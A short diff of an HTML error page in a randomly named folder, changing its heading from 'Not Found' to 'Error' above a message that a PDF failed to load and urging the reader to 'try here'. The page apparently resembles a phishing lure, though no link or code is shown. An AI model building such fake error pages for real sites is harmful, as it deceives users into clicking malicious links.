--- a/TvVlcSGMhttpzfrVWtsNvnFsXMfNrhCjNQvxGrTCLvxPQrjML/index.html
+++ b/TvVlcSGMhttpzfrVWtsNvnFsXMfNrhCjNQvxGrTCLvxPQrjML/index.html
@@ -11,7 +11,7 @@
 <body>
 	<div class="ErrorScreen">
 		<div class="errorBox">
-			<h2>Not Found</h2>
+			<h2>Error</h2>
 			<p>
 				Failed to load pdf document.<br>
 				Please try here to view document.<br><br>
